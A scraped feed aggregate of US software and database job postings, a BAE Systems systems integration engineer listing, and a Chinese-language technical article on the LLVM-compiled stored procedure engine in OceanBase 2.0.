-Significant room for growth -Outstanding work environment **What You Will Be Doing** -Full stack development in PHP and JavaScript -Design/develop front-end interfaces, underlying APIS, and backend systems -Enhance existing business applications -Help lead/mentor more junior developers **What You Need for this Position** At Least 3-5 Years of experience and knowledge of: - PHP - JavaScript - API Design - HTML/CSS Strong nice to haves: -SQL - LAMP stack - SQL - JQuery **What's In It for You** - Vacation/PTO - Medical - Dental - Vision - 401k So, if you are a Senior Software Engineer with PHP and JavaScript experience, please apply today! Applicants must be authorized to work in the U.S. **CyberCoders, Inc is proud to be an Equal Opportunity Employer** All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, disability, protected veteran status, or any other characteristic protected by law. **Your Right to Work** – In compliance with federal law, all persons hired will be required to verify identity and eligibility to work in the United States and to complete the required employment eligibility verification document form upon hire. *Senior Software Engineer - PHP, JavaScript, LAMP* *MN-Cottage Grove* *MB6-1492934*
          (USA-PA-Kulpsville) Full-Stack Developer- Rapidly Growing Marketing Agency      Cache   Translate Page      
Full-Stack Developer- Rapidly Growing Marketing Agency Full-Stack Developer- Rapidly Growing Marketing Agency - Skills Required - PHP, MySQL, SSO integrations such as SAML2, APIs, Content Management Systems like WordPress and Magento, JavaScript Frameworks like React, JavaScript, XHTML, CSS, JQuery If you are a Full-Stack Developer with experience, please read on! **Top Reasons to Work with Us** 1. Based outside of Philadelphia, we are a rapidly growing marketing company. 2. Have been around for 10+ years and rapidly growing. 3. You will get the chance to work on exciting new development projects on a talented team. **What You Will Be Doing** -Assist Digital Project Manager in mapping development needs for proposed projects and projects in process -Assist Digital Project Manager in monitoring status of projects in process and reporting status updates to business development and account staff -Develop websites, website apps and native apps using: Content Management Systems: WordPress and Magento (Shopify, BigCommerce, Joomla and Drupal are a plus) Modern Javascript Frameworks such as React -MySQL database management -SSO integrations such as SAML2 -APIs **What You Need for this Position** -Minimum 2+ years of experience with web development - including responsive design, search engine optimization, and custom applications -Possess basic development programming skills to include, JavaScript, PHP, XHTML, CSS, jQuery and API's -Candidate must have a strong understanding of UI, cross-browser compatibility, general web functions and standards -A solid understanding of web application development processes, from the layout/user interface to relational database structures -Ability to communicate directly with peers, managers, and clients while leading development to a completed and successful solution -Strong organization skills to manage multiple timelines and complete tasks quickly within the constraints of clients' timelines and budgets -Experience programming common content management systems:Wordpress and Magento (Shopify, BigCommerce, Joomla and Drupal are a plus) -Demonstrated ability to work autonomously with solid decision-making skills -Intellectually curious and passionate about digital culture and technology **What's In It for You** -Competitive Base Salary ($60k-$70k) -401k -Vacation/PTO -Paid Holidays -Medical/Dental/Vision So, if you are a Full-Stack Developer with experience, please apply today! Applicants must be authorized to work in the U.S. **CyberCoders, Inc is proud to be an Equal Opportunity Employer** All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, disability, protected veteran status, or any other characteristic protected by law. **Your Right to Work** – In compliance with federal law, all persons hired will be required to verify identity and eligibility to work in the United States and to complete the required employment eligibility verification document form upon hire. *Full-Stack Developer- Rapidly Growing Marketing Agency* *PA-Kulpsville* *KC9-1492844*
          (USA-NC-Cary) Software Engineer - PHP, Java, JavaScript      Cache   Translate Page      
Software Engineer - PHP, Java, JavaScript Software Engineer - PHP, Java, JavaScript - Skills Required - PHP, Java, JavaScript, MySQL, MVC, Linux, Apache, GIT, Subversion If you are a Software Engineer with PHP and Java experience, please read on! Based in Cary, NC - we provide accurate contact information and sales leads related to the e-commerce industry. Our company is looking for the right candidate to join our in-house engineering team. So, if you are interested in joining our growing team, please apply today! **Top Reasons to Work with Us** 1. Amazing Reputation. 2. Work with and learn from the best in the business. 3. Opportunity for career and income growth. **What You Will Be Doing** - Improve our next generation web technology tracking systems using machine learning and AI - Design and develop algorithms and techniques for high-volume data analysis - Build upon some of our most advanced platforms to maximize performance. **What You Need for this Position** At Least 3 Years of experience and knowledge of: - PHP - Java - JavaScript - MySQL - MVC - Linux - Apache - GIT - Subversion **What's In It for You** - Vacation/PTO - Medical - Dental - Vision - Relocation - Bonus - 401k So, if you are a Java Engineer with experience, please apply today! Applicants must be authorized to work in the U.S. **CyberCoders, Inc is proud to be an Equal Opportunity Employer** All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, disability, protected veteran status, or any other characteristic protected by law. **Your Right to Work** – In compliance with federal law, all persons hired will be required to verify identity and eligibility to work in the United States and to complete the required employment eligibility verification document form upon hire. *Software Engineer - PHP, Java, JavaScript* *NC-Cary* *JW8-1492814*
          (USA-VA-Reston) Java Engineer      Cache   Translate Page      
Java Engineer (Mid-level to Senior) Java Engineer (Mid-level to Senior) - Skills Required - Java Servlets, Java Server Pages, Apache Tomcat, MySQL, Java 8, Hashmap, Lock, JDBC, GIT, Agile If you are a Java Engineer (Mid-level to Senior) with experience, please read on! **Top Reasons to Work with Us** Competitive salaries and benefits packages offered. As part of our team, you'll spend time solving challenging problems in a customer-centric environment with a team that always make tasks fun. This client has a 7-year history of innovation, stability, and profitability. **What You Will Be Doing** -Participate in product design reviews to provide input on functional requirements, product designs, and development schedules -Analyze implementation choices for selected algorithms -Implement real-time distributed services for SaaS solution -Integrate third-party interactions via real-time API calls **What You Need for this Position** -MS in Computer Science or Software Engineering (GPA 3.5+/4), plus three (3) years of software development experience; OR BS Degree in Computer Science or Software Engineering (GPA 3.5+/4) plus five (5) years of software development experience; -At least four (4) years of programming experience in Java, Java Servlets, and Java Server Pages with application deployment on Apache Tomcat and MySQL as the most recent development experience; at least 100,000 lines of written Java code in the past three (3) years; and at least four (4) years of real-time enterprise development experience, including the support for multiple tenants, distributed transactions, persistent queues, and thread-safe service delivery. -Must also have thorough understanding of advanced abstract data structures such as lists, queues, trees including the operations (e.g., insert, remove) with their corresponding computational complexities (e.g., big-O (1)); -Knowledge of analysis of algorithms with emphasis on worst-case complexity and time/space tradeoffs covering general-purpose sorting (e.g., selection sort), traversal (e.g., breadth-first), search (e.g., binary search), and storage; -Excellent knowledge of core Java 8, including available abstract data structures (e.g., HashMap), concurrency control mechanisms (e.g., Lock), memory management, security, object serialization and persistence via JDBC; -Source control management experience with emphasis on Git; advanced understanding of different software development models with emphasis on iterative approaches such as Agile; and experience with Linux user, basic shell programming **What's In It for You** - Vacation/PTO - Medical - Dental - Vision - Relocation - Bonus - 401k So, if you are a Java Engineer (Mid-level to Senior) with experience, please apply today! Applicants must be authorized to work in the U.S. **CyberCoders, Inc is proud to be an Equal Opportunity Employer** All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, disability, protected veteran status, or any other characteristic protected by law. **Your Right to Work** – In compliance with federal law, all persons hired will be required to verify identity and eligibility to work in the United States and to complete the required employment eligibility verification document form upon hire. *Java Engineer* *VA-Reston* *JG2-1493046*
          (USA-CO-Boulder) Full Stack Engineer      Cache   Translate Page      
Full Stack Engineer Full Stack Engineer - Skills Required - Ruby On Rails, JSON APIs, HTML, CSS, JavaScript, MySQL, PostfreSQL, ORM, Python, GIT If you are a Full Stack Engineer with experience, please read on! Based in Boulder, we are an agricultural company that provides commercial growers and agronomists with real-time insight and intelligence necessary to enhance farming efficiencies and increase profitability through drone technology. Due to growth, we are seeking a skilled Full stack Engineer to add to our team. If you are interested in hearing more, apply now! **What You Need for this Position** - Ruby On Rails (preferred) or Python - JSON APIs - HTML - CSS - JavaScript - MySQL or PostgreSQL - Docker or some other virtualization technology Nice to have: - Leaflet, Mapbox, Geoserver - GIT **What's In It for You** - Competitive salary - Vacation/PTO - Medical - Dental - Vision - 401k - Company perks and more! So, if you are a Full Stack Engineer with experience, please apply today! Applicants must be authorized to work in the U.S. **CyberCoders, Inc is proud to be an Equal Opportunity Employer** All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, disability, protected veteran status, or any other characteristic protected by law. **Your Right to Work** – In compliance with federal law, all persons hired will be required to verify identity and eligibility to work in the United States and to complete the required employment eligibility verification document form upon hire. *Full Stack Engineer* *CO-Boulder* *CG3-1492741*
          (USA-MA-Billerica) Principal Database Administrator - MS SQL      Cache   Translate Page      
Principal Database Administrator - MS SQL Principal Database Administrator - MS SQL - Skills Required - SQL Server 2016, T-SQL, Business Continuity, AlwaysOn, Performance Tuning, Amazon Web Services, Oracle, MySQL, PostgreSQL, Visual Studio Title: Principal Database Administrator Compensation: up to $145K + Bonus + excellent benefits Location: Billerica, MA Specialties: SQL Server 2016, AlwaysOn, Business Continuity, and Performance Testing, Oracle, T-SQL, AWS Located in the beautiful town of Billerica - just outside of Boston, MA - we are a leading security and identity solutions company that leverages artificial intelligence, biometrics, and cryptography to provide faster, more accurate, and more reliable identity solutions for our customers. With 60 years of experience working for the US National Security and Public Safety communities, we've learned to utilize our technologies and innovations to ensure that, at the end of the day, only you can be you. Currently we are looking for a Principal Database Engineer to join our team. The ideal candidate has at least 10 years of SQL Server Admin experience, with hands-on knowledge of SQL Server 2016. Experience with AlwaysOn, Business Continuity, and Performance Testing is required, as is experience with T-SQL and Amazon Web Services. Non-Microsoft database experience is helpful (Oracle, PostgreSQL, MySql), as is DevOps and Visual Studio experience. Advanced Microsoft certifications would also be a huge plus. If this sounds like a match for you, apply today or send your resume directly to ben.bosworth@cybercoders.com! We are actively interviewing this week and next week. **What You Will Be Doing** - Provide deep technical knowledge and leadership to a team responsible for the support of Microsoft SQL Server databases. - Update, backup, maintain & troubleshoot databases. Perform troubleshooting, resolution and root cause analysis for database and application specific incidents. - Creates processes and procedures to minimize any potential downtime scenarios. - Creates standards for SQL Server database administration that supports the use of optimal database server resources and performance. - Serve as primary escalation point for critical database issues related to core systems and applications. - Analyze large, complex systems to determine performance bottlenecks, application bugs, and opportunities to improve efficiency. **What You Need for this Position** 1.) 10+ years of SQL Server administration experience is required. 2.) Solid knowledge of AlwaysOn, Business Continuity, and Performance Testing. 3.) Experience working with Amazon Web Services. 4.) Strong knowledge of T-SQL. 5.) B.S./M.S. in CS, IS, CpE or EE Nice to have, but not required: 1.) Experience with Non Microsoft database technologies (Oracle, PostgreSQL, MySql) 2.) Advanced Microsoft certifications (MCSA, MCSE) **What's In It for You** - Competitive salary (up to $145K, DOE) + Bonus - Excellent benefits package - Vacation/PTO - Medical, Dental, Vision - 401K Matching - A fun, team-oriented working environment where hard work is recognized and rewarded. So, if you are an experienced Database Administrator in Billerica, please apply today! Applicants must be authorized to work in the U.S. **CyberCoders, Inc is proud to be an Equal Opportunity Employer** All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, disability, protected veteran status, or any other characteristic protected by law. **Your Right to Work** – In compliance with federal law, all persons hired will be required to verify identity and eligibility to work in the United States and to complete the required employment eligibility verification document form upon hire. *Principal Database Administrator - MS SQL* *MA-Billerica* *BB11-1493024*
          (USA-FL-Orlando) PHP Web Developer - Mid level      Cache   Translate Page      
PHP Web Developer - Mid level PHP Web Developer - Mid level - Skills Required - PHP, LAMP Stack, Web Application Development, Laravel If you are a PHP Developer with 3+ years of web application development experience, please read on! Based in Orlando, FL - We're a FAST growing, very profitable retail company offering a variety of products & services all over the country. Our company has over 400 locations across the country with our corporate headquarters being in downtown Orlando! We landed a brand new program and need PHP Developers to come on board who want to work with the latest tech on NEW projects & development. --If interested and qualified, please apply and include any links to work/code samples to have priority!-- **Top Reasons to Work with Us** - We pride ourselves on our upbeat and collaborative culture. - We're offering a great starting comp package including base salary + benefits + PTO + more! - You'll be working with the latest technologies like Laravel, AWS, and more. **What You Will Be Doing** - Handling API to APi integrations & Core Processes - Working on new projects in a LAMP stack environment, using Laravel! - 80% new development & 20% maintenance. - Collaborating with lead engineers, Director of Development, QA, and design team on best practices. **What You Need for this Position** Must Have: - 3+ years of PHP experience on backend applications - MySQL experience - Modern programming techniques (OOp, unit testing, etc) - MVC framework experience - API Implementation experience Preferred: - Experience with Laravel This is a great, long term career opportunity with tons of career growth. Don't miss out on it! Applicants must be authorized to work in the U.S. **CyberCoders, Inc is proud to be an Equal Opportunity Employer** All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, disability, protected veteran status, or any other characteristic protected by law. **Your Right to Work** – In compliance with federal law, all persons hired will be required to verify identity and eligibility to work in the United States and to complete the required employment eligibility verification document form upon hire. *PHP Web Developer - Mid level* *FL-Orlando* *AP3-1493002*
          2.0解析系列 | OceanBase 2.0――第一款支持“存储过程”的原生分布式数据库      Cache   Translate Page      

OB君 :本文是 “ OceanBase 2.0 技术解析系列 ” 的第八篇文章,今天我们来说说2.0版本最标志性、最不得不提的新特性――存储过程。在为数不多的原生分布式数据库中,OceanBase 2.0是第一款支持存储过程功能的产品。本文将为你深入剖析2.0中存储过程的功能特性和实现机制。更多精彩欢迎关注OceanBase公众号持续订阅本系列内容!


2.0解析系列 | OceanBase 2.0――第一款支持“存储过程”的原生分布式数据库
引言

PL/SQL(存储过程)是一种程序语言,叫做过程化SQL语言(Procedural Language/SQL),从Ada语言发展而来。PL/SQL是关系数据库对SQL语句的扩展,在普通SQL语句的基础上增加了编程语言的特点,把数据操作和查询语句组织在PL/SQL的过程化代码中,通过逻辑判断、循环等操作实现复杂的功能。

使用PL/SQL可以编写具有很多高级功能的程序,能够把业务逻辑封装在数据库内部,提供更好的抽象和安全性,同时减少了网络的交互,并且调用更快,从而提升整体性能。

目前无论是商业数据库还是开源产品几乎都在一定程度上支持类似PL的功能,但是采用的规范标准不尽相同。使用最广泛的是Oracle的PL/SQL,最早在1989年发布,语法基于Ada语言。

除此之外还有SQL Server的T-SQL,PostgreSQL的PL/pgSQL等。SQL标准中的SQL/PSM(SQL/Persistent Stored Modules)定义了存储过程中使用的PL,但是Oracle的PL/SQL已经成为了事实上的规范。mysql采用的是SQL/PSM标准,但是并非100%兼容。OceanBase 2.0当前的PL以兼容MySQL为主体,MySQL没有的功能参照Oracle实现。

MySQL和PostgreSQL的PL都采用解释执行方式,从实现角度来说,解释执行比编译执行更容易实现,也更易于控制。但是理所当然的,解释执行比编译执行性能相对较差。

Oracle 9.x之前的PL也是解释执行(Interpreted Compilation)的,从9.x开始,Oracle提供了编译执行(Native Compilation),SQL/PL首先被翻译为C语言代码,然后调用C编译器编译为机器码,编译后的程序存在动态链接库中,运行时执行器直接装载调用动态链接库中编译好的函数。

根据Oracle自己的说明,编译后的程序比解释执行性能提升1.05到2.4倍。具体提升的程度取决于程序的特性。因为SQL语句本身还是解释执行的,所以如果PL的主体是程序控制逻辑,那么提升效果会很明显,而如果PL的主体是SQL语句,那么PL的性能提升不会显著。另外Oracle的PL调试功能只支持解释执行方式。

编译执行是一个趋势,目前除了PL之外,很多数据库也纷纷在尝试把SQL引擎改写为编译执行,包括MemSQL、HANA、PostgreSQL等。OceanBase PL采用编译执行的方式,使用LLVM生成native code,并直接把机器码装载到程序段执行,无需依赖外部C编译器和生成动态链接库。

无论解释执行还是编译执行,当前的商业数据库都只支持单机,OceanBase在分布式环境下在关系数据库里支持了完整的PL/SQL功能,这在业界尚属首次。

价值和意义

1. 降低RT

PL对于业务最直接的价值就是降低业务的RT。假如某个业务逻辑里面一条完整的执行链路平均有200条SQL,也就是应用需要和数据库交互200次。在同机房的情况下网络开销大约需要0.5ms,如果把200次交互省掉,那么就可以节约100ms的RT。当然,事实上因为业务有自身的逻辑,不可能全部逻辑都可以用PL/SQL来实现,所以这200次交互不可能全部省掉,但是即便省下一半,也会有大约50ms的RT提升。

2. 节省资源

减少网络交互除了减少RT,另一个直接的效果是减少了网络的数据传输和网络开销。假如某个互联网业务的网络开销平均是30%,也就是说30%的CPU都花在了网络的收发和解析上。如果说几十个ms的RT对整个链路来说比例不那么显著的话,30%的CPU资源节省缩省下的机器可是以亿计的真金白银,而把这些机器资源换算成系统处理能力也将是惊人的。

3. 提高吞吐率

事实上利用PL/SQL带来的网络开销的节省只是表面,更深层次的是,因为每个事务的RT缩短,每个事务在数据库内核所抢占临界区的时间缩短,使得系统的CPU利用率获得大幅提升,整个吞吐量也随之提高。这种提升不止在数据库内核存在,对业务的应用逻辑同样有帮助。CPU利用率的提升所获得价值同样也是亿级规模的。

4. 提升稳定性和可靠性

当前的互联网分布式业务多是单元化部署,应用和数据库部署在同机房,并且在大多数情况下都是机房内访问,一旦发生故障导致某个数据库的数据不可访问,OceanBase会自动切换访问其他副本,与此同时应用也必须随之切走,否则同机房的数据库访问将变成跨机房甚至跨城访问,网络开销也将由原来的每次0.5ms变成2ms,甚至达到7ms~30ms。对于单次来说这不算什么,但是在几百条SQL的加成下就可观了。

巨大的网络延迟会对整个业务系统造成严重影响,甚至拖垮整个系统。而利用了PL/SQL之后,这些问题都将不复存在,业务将不再和数据库强绑定,计算和计算的分离成为可能,整个系统的可靠性获得提升。

同时,OceanBase的设计对于网络要求相对比较高,集群内部通信以及内部流程逻辑也都可以利用PL/SQL实现,这不仅提升能够内部通信的效率,同时也使得数据库内核的核心代码充分简化,减少出错路径,提升稳定性。

并且部分业务逻辑改为PL后,业务的代码将会减少,业务开发流程也会相对简化,同时提供更好的抽象和安全性。

实现机制

1. 框架结构

图1给出了OceanBase PL Engine工作的调用关系图。PL引擎(PL Engine)和SQL引擎(SQL Engine)可以互相交互,SQL可以直接访问PL引擎,比如在一个SQL语句中使用了用户自定义函数。PL引擎可以通过SPI接口访问SQL引擎,比如在PL里进行表达式计算和执行SQL语句。


2.0解析系列 | OceanBase 2.0――第一款支持“存储过程”的原生分布式数据库

图1:PL Engine工作调用关系

2. PL Engine

PL Engine由六个模块组成:Parser、Resolver、Code Generator、Compiler、Executor和PL Cache,其中Parser、Resolver、Code Generator和Compiler构成了一个完整的PL编译流程。如图2所示。

Parser

语法解析器,用于分析PL语法生成语法树(ParseTree)。PL引擎和SQL引擎各自实现了单独的Parser,但是两个Parser尽量不做冗余的工作。一个查询串进入Observer首先进入PL Parser解析,如果发现是SQL语句则交由SQL引擎解析。

Resolver

Resolver用于进行语义分析,例如检查变量作用域、静态SQL中数据对象的Schema等,并为每一条PL语句生成对应的AST结构以及全局的FunctionAST结构。FunctionAST存储了PL定义的基本信息和生成的全局符号表、全局标签表、全局异常表等信息。每一条语句的AST里面则记录了指向这些全局表的逻辑信息。

Code Generator

对于解释执行来说,AST已经足够。但是对于编译执行,需要对AST进行进一步的翻译,这一步是使用LLVM提供的接口,把AST树翻译成IR中间码的过程。IR码可以输出,以核对检验翻译过程是否正确。

Compiler

通过JIT把IR码生成机器码的过程,输出为PLFunction结构。

Executor

PL的执行器,根据编译出的PLFunction,和输入参数构造执行环境,调用函数指针,得到函数结果。

PL Cache

PL Cache存在的目的是为了避免每一次都重新编译PL,提升PL的执行效率。所以对于匿名块(Anonymous Block)没有Cache的必要。

PL Cache是一个hash表,通过Key(Procedure或Function的ID)查找到Value(PLFunction),并通过访问Schema检查PLFunction的有效性,如果失效则趁机删除。

PL Cache是PL Engine的内部机制,PL Engine对外提供统一的通过ID执行Procedure或Function的接口,外部不必关心PL的缓存机制,只需通过PL Engine对象执行PL即可。


2.0解析系列 | OceanBase 2.0――第一款支持“存储过程”的原生分布式数据库

图2:PL Engine模块组成

PL Engine根据ID在PL Cache查找是否有编译好的PLFunction,如果有则进一步检查Version是否可用。如果PL Cache中没有可用的PLFunction,则调用编译流程进行编译,编译后的结果缓存在PL Cache,并交给Executor执行。

最终编译出的结果是一段二进制代码的内存地址,Executor将这段内存地址转成一个函数指针,并传入执行参数和执行环境运行得到结果。

3. 编译执行

编译执行比解释执行的优势毋庸赘言,OceanBase 也是采用把存储过程编译为机器码的方式进行执行,但是和Oracle实现不同的是,OceanBase采用JIT技术,无需依赖外部C编译器和生成动态链接库。采用这一技术方案,有如下优点:

无需研究体系结构相关的复杂的机器码生成,就可以获得编译执行的效果;生成LLVM IR比生成汇编简单很多,且自然拥有了考虑跨平台能力; LLVM提供的成熟的优化模块都是基于LLVM IR的,clang等项目中对优化器的改进都可以直接被我们受益; 用JIT技术在Observer内直接控制生成编译后的代码,比Oracle采用的在数据库外部编译器编译结合动态链接库装载的方式在可控性,性能,可维护性各方面都有优势; PL的编译执行可以和SQL表达式及部分physical operator甚至是整个查询计划采用编译执行相结合,获取整体性能的提升。

图3给出了PL 编译的工作流程。Parser、Resolver和Code Generator三个模块完成了编译器的前端(Frontend)工作,实现从PL文本到中间码(LLVM IR)的转换过程。Compiler模块完成了Pass和后端(Backend)的工作,把中间码经过Pass流程优化,并生成实际的机器码。


2.0解析系列 | OceanBase 2.0――第一款支持“存储过程”的原生分布式数据库

图3:PL编译工作流程

这种架构下,对于实现PL/SQL语言来说,大量的工作是实现一个前端,即Parser、Resolver和Code Generator三个模块,而对于Compiler可以调用LLVM提供的接口实现。

兼容性

各大数据库支持的PL都各有不同。目前最广泛使用的Oracle PL/SQL语言最早在1989年发布,语法基于Ada语言。PostgreSQL的PL/pgSQL,SQL Server的T-SQL等语言都各不相同。SQL标准中的SQL/PSM (SQL/Persistent Stored Modules)定义了存储过程中使用的PL,但遗憾的是主流数据库厂商并没有全心支持。

像PL/pgSQL一样,MySQL采用了SQL/PSM标准,但是并非100%兼容。 OceanBase 提供MySQL和Oracle两种兼容模式,PL/SQL也同样既可以使用Mysql的用法,也可以选择Oracle兼容模式,基于Mysql或者Oracle的PL的代码可以一行不改的迁移到OceanBase运行。

分布式

OceanBase天然的分布式特性决定PL的执行也是分布式的,PL的解析、编译和执行都在某一个Observer上完成,当PL里涉及到SQL交互时,会通过SPI调用SQL Engine,由SQL Engine执行SQL语句,如果该SQL语句是一个分布式的,那么自然而然会进行分布式执行。

OceanBase选择存储过程里访问的第一张表的数据所在的节点编译和执行PL,这是为了尽量使得PL对数据的访问都是LOCAL的。如果无法确定所访问数据所在的节点,则随机选取一个节点。

当分布式执行的SQL调用了PL函数时,PL函数可能会在多个Observer上编译执行,每个Observer上保证在相同的环境参数下进行编译,从而编译出的PL具有相同的行为。

调试

调试是编程语言的基本需求,所以事实上Mysql这样不支持调试的PL/SQL是不具备大规模应用的基础的。

业界实现PL的调试功能都只在解释执行模式支持,Oracle的编译执行模式不支持调试。OceanBase只有一种编译执行模式,支持在编译模式进行调试,并且是在分布式的环境下进行调试。目前支持的调试功能包括设置断点(b)、查看断点(info b)、查看变量(p)、查看堆栈(bt)、单步运行(s)、进入函数(s)、继续(c)等等,通讯方式采用类似Oracle的方式,建立一个数据库连接来调试另一个连接,调试指令用文本指令,不发明新的通讯协议,并通过包的形式对外提供接口。

分布式调试是分布式环境下实现PL/SQL的难点,当PL分布式执行时,用户的调试线程连到其中一个节点,该节点需要再和其他分布式执行节点建立调试连接并传输指令和数据。

Mysql没有包(Package),OceanBase提供和Oracle完全兼容的包机制,用户在Oracle上创建的包可以一行不改的迁移到OceanBase上创建和运行。

但是Oracle的系统包目前OceanBase还没有全部支持,这也将成为今后一段时间我们要做的工作之一。在有了PL/SQL的基础能力支持和Package的机制之后,其余的系统包可以根据需要快速实现。

总结和展望

从OceanBase诞生的第一天起,团队的目标就不是想做一个数据库只给自己用,而是要做一个通用数据库真的去推动整个社会的进步,能够让整个社会的生产力发生变化。

随着蚂蚁金服的开放赋能,OceanBase也开始服务外部客户,金融行业的很多客户以前都有很大一部分业务是使用Oracle开发,并且大量使用了PL/SQL,这种现状在非金融行业中更为普遍,而这也成为了Oracle绑在客户身上最重要的一条锁链。 OceanBase要为客户提供比Oracle更可靠、更高性价比的服务,PL/SQL是必须迈过去的一道门槛。 这道门槛很难迈,而一旦迈过去,就会形成OceanBase的重要优势。

另一方面,虽然互联网公司目前的现状是普遍都不使用PL/SQL进行业务开发,但是难掩其对业务的巨大价值,PL不仅能够降低RT,提高资源利用率,提升系统吞吐率、稳定性和可靠性,同时也是服务用户,尤其是传统行业客户的重要基础。在这一方面蚂蚁金服走在互联网行业前列,已经开始在内部尝试利用PL/SQL的优势来解决业务的问题。

OceanBase提供了同时兼容Mysql和Oracle两种模式的PL/SQL,并利用LLVM实现其编译执行的内核引擎,使得PL控制逻辑本身性能能够达到Oracle相当的水平。而且OceanBase是业界第一个真正意义上支持分布式PL的商业产品,并提供完善和兼容的调试机制。与此同时OceanBase还提供了完备的包机制。

未来除了进一步完善Oracle兼容的系统包之外,还需要继续优化PL/SQL的性能。与此同时,我们也会在更多内部业务中推广使用PL/SQL,为业务创造巨大的价值,并在提供给外部客户使用之前做好技术沉淀和产品锤炼。

加入OceanBase 2.0技术交流群

― 想了解更多OceanBase 2.0新特性?

― 想与蚂蚁金服OceanBase的一线技术专家深入交流?

扫描下方二维码联系小编,快速加入OceanBase技术交流群!


2.0解析系列 | OceanBase 2.0――第一款支持“存储过程”的原生分布式数据库

          (USA-CA-San Diego) Systems Integration Engineer      Cache   Translate Page      
**Job Description** The Customer Technical Solutions team at Advanced GEOINT Systems (AGS) provides on-site installation, customization, support and training for the various GXP Platform, desktop and mobile products in environments ranging from traditional desktop to cloud based implementations. You will be required to conduct software demonstrations at trade shows, conferences and customer sites.You will also be responsible for providing incident management, problem management, and technical support for the customer environments while working closely with internal and external customers, internal support personnel, product testing, and engineering. As a member of the Customer Technical Solutions team, you will: + Work with members of our software support and test teams, product managers, and customers to integrate, configure, and apply intelligence processing, exploitation, and dissemination (PED) products. + Develop strong relationships with key customer technical personnel to ensure customer satisfaction and grow our business. + Become an expert in configuring and applying our products and provide customer feedback to product managers and the development teams. + Assist with training material development. **About GXP:** The Geospatial eXploitation Products (GXP) business provides licensed software capabilities and geospatial technology R&D. GXP s ability to draw on internal data production and technology expertise has allowed it to deliver superior products to the user community. GXP often finds ways to improve software implementation through user conferences and regional workshops, where important feedback and insight is gathered from customers. GXP commercial software, GXP Xplorer, GXP WebView, SOCET GXP, and SOCET SET provide customers with comprehensive image and video analysis, data management and geospatial production capabilities, andstate-of-the art sensor-data processing and analytics technologies, providing compact and scalable solutions to challenging problems in areas of video analytics, sensor data processing, computer vision, and machine learning. These products serve government and civil customers needs for photogrammetry, mapping, GIS, image exploitation, precision targeting, GEOINT (geospatial intelligence), MOVINT (movement intelligence), 3-D visualization, simulation and mission planning. **Culture characteristics:** + Treating customers, fellow employees, stakeholders, and partners with respect and dignity at all times. + Shows sincere commitment and adherence to all Corporate Compliance issues. + Humble attitude about knowledge limitations, know when to ask for help. + Ability to knowledge-share among team members, across partnered functions and the customer so that cases can continue with the utmost drive to a solution. + Have your peers' backs so that customers experience the same level of integrity regardless of whom they are working with. + Learn from one another. Take the time to learn a new product. + Demonstrate leadership in your actions. + Participating in maintaining an organized, clean, and safe work environment. + Self-discipline, the ability to prioritize tasks, and a detail-oriented working style. + Planning and managing projects without supervision. + Ability to learn from experience and informal instruction. + Adopt a strategy of continuous improvement. + In addition to having remarkable core IT skills, the Systems Integration Engineer must have customer focus in their DNA and do whatever it takes to achieve outstanding results for our customers. + Have a positive attitude, self-motivation, and a results-oriented approach to business. **General daily responsibilities include:** Performing technical planning, system integration, verification and validation, evaluates alternatives including cost, risk, supportability and analyses for total systems. Analysis is performed at all levels of total system product to include concept, design, fabrication, test, installation, operation, maintenance and disposal. Ensuring the logical and systematic conversion of product requirements into total systems solutions. Translating customer requirements into hardware/software specifications.Responsibilities will include installation and testing our solutions within the customer environment, to include: back-end services, front-end services, web applications, mobile applications, and improving the overall quality of our products. You will be required to analyze, test and verify the implementation of the functional and non-functional requirements of a cloud-based distributed system. + Submit defect reports and enhancement requests via JIRA. + Participate in Product Test activities. + Collaboratively work with Customer Technical Solutions team to resolve or diagnose customer issues. + Provide problem management by taking ownership of repeating incidents, researching root cause and resolving problem. + Understanding, applying, and communicating the technology concepts and implementations of our products. + Participating as a customer advocate in the engineering development process. + Contributing to the development of customer support material such as technical manuals, application briefs, and product data sheets as needed. **Typical Education & Experience** Typically a Bachelor's Degree and 4 years work experience or equivalent experience **Required Skills and Education** **Required Skills and Education** Bachelor's degree in computer science, engineering or another related fieldor at least four years of additional experience in lieu of a degree. Strong analytical, problem solving, and debugging skills. + Excellent communication skills, both written and verbal. + Excellent attention to detail, design, and user experience awareness. + Ability to work well in a very dynamic, fast moving environment with high expectations. + Flexibility in adjusting to variable workload and job duties. + Ability to work independently and with little supervision. + Proficiency with virtual servers (HyperV and VMware). + Experience installing, running, and troubleshooting software in Windows. + Exceptional organizational and prioritization skills. + Strong problem solving and analytical skills to diagnose issues at system level, including Windows/Linux operating system, SQL Server, web services and application integration. + Software diagnosis and troubleshooting. + A valid passport and the ability to travel domestically or internationally. + U.S. CITIZENSHIP REQUIRED. Candidates selected for some positions will be subjected to a government security investigation and will need to meet eligibility requirements for access to classified information. **Preferred Skills and Education** + SOCET GXP + GXP Xplorer + GEOINT + GIS + AWS + CITRIX XenServer / XenDesktop + VMWare VSphere, Horizon + NVIDIA GRID + Comfortable with presentations and speaking in front of large groups. + Multi-source processing, exploitation, and dissemination workflows. + Experience in providing software technical support. + Experience working with multiple OS types (Windows, Linux, OSX) and versions of SQL database configuration, optimization, and administration (MySQL, PostgreSQL). + Networking and networking protocols (TCP/IP, UDP, RDP). + Full-motion video (FMV) sensors, formats, codecs, and protocols. + Storage, retrieval, and streaming of video streams. + Programming in JavaScript, CSS, HTML, Python, and SQL. + Familiarity with OGC standards, such as WMS, WMTS, and WFS. **About BAE Systems Electronic Systems** BAE Systems is a premier global defense and security company with approximately 90,000 employees delivering a full range of products and services for air, land and naval forces, as well as advanced electronics, security, information technology solutions and customer support and services. The Electronic Systems (ES) sector spans the commercial and defense electronics markets with a broad portfolio of mission-critical electronic systems, including flight and engine controls; electronic warfare and night vision systems; surveillance and reconnaissance sensors; secure networked communications equipment; geospatial imagery intelligence products and systems; mission management; and power-and energy-management systems. Headquartered in Nashua, New Hampshire, ES employs approximately 13,000 people globally, with engineering and manufacturing functions primarily in the United States, United Kingdom, and Israel. Equal Opportunity Employer/Females/Minorities/Veterans/Disabled/Sexual Orientation/Gender Identity/Gender Expression **Systems Integration Engineer** **BAE1US21211** EEO Career Site Equal Opportunity Employer. Minorities . females . veterans . individuals with disabilities . sexual orientation . gender 